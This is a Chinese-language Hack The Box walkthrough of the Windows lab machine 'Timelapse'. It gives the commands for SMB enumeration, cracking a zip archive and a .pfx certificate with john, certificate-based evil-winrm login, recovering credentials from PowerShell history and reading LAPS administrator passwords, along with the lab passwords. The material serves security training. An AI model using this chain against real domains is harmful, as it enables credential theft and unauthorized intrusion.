【Hack The Box】windows练习-- Timelapse

HTB 学习笔记

【Hack The Box】windows练习-- Timelapse

---

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年11月17日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

信息收集

53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-06-30 20:44:10Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-06-30T20:47:10+00:00; +8h01m03s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
62656/tcp open  msrpc             Microsoft Windows RPC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

dc01.timelapse.htb
ker,dns,smp,winrm,rpc
timelapse.htb
但是smb没有像以前那样返回一堆数据，有些异常

我看smb

smbclient -L //dc01.timelapse.htb -N

oxdf@hacky$ smbclient -L //dc01.timelapse.htb -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
1
2
3
4
5
6
7
8
9
10
11

Shares 应该是我唯一可以获得一些东西地方

三股以 $是所有Windows系统上的默认共享，并且ADMIN$和 C$需要管理员权限，并且IPC$提供的不多。

smbclient -N //dc01.timelapse.htb/Shares
1

本地管理员密码解决方案 (LAPS) 是一种通过域管理本地管理员帐户密码的方法。 如果没有 laps，支持团队管理为每个系统保留唯一的本地管理员密码是非常具有挑战性的。 这导致共享凭据，这意味着当攻击者在系统上获得提升的特权时，他们可以转储共享凭据并使用它来访问其他系统。

LAPS 还会轮换管理员密码，定期更改它们，这样如果它们被攻击者捕获，它们会在一段时间后失效。

爆破压缩包

zip2john winrm_backup.zip > zip.txt
john --wordlist=/usr/share/wordlists/rockyou.txt zip.txt
1
2

legacyy_dev_auth.pfx
openssl从中提取私钥和证书（公钥）的命令 .pfx文件

pfx一系列

/usr/share/john/pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash

john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash 
1
2
3

得到密码
thuglegacy

得到enc

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
thuglegacy
1
2

得到key

openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
解密密钥

转储证书得到crt

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt

登陆

evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt

net user legacyy
1
2
3

只有一个远程登录组，这个没啥说的，我已经远程了，没有利用价值
还有一个development组，不知道是干嘛的，先等一会，没遇见过，先不管

SeMachineAccountPrivilege
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
这三个组都没有利用价值

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
1

这里面，查看ps的历史文件，这里常见

得到一组凭证

svc_deploy
E3R$Q62^12p7PLlC%KWaxuaV
1
2

evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
1

使用 LAPS，DC 管理域中计算机的本地管理员密码。 通常创建一组用户并授予他们读取这些密码的权限，从而允许受信任的管理员访问所有本地管理员密码。

Get-ADComputer DC01 -property 'ms-mcs-admpwd'
1

0OEJYZa3a69}%63e$2PZ,-Cq

这里最好快一点，因为ldaps会变更密码，谁知道密码会不会变呢

然后flag自己找吧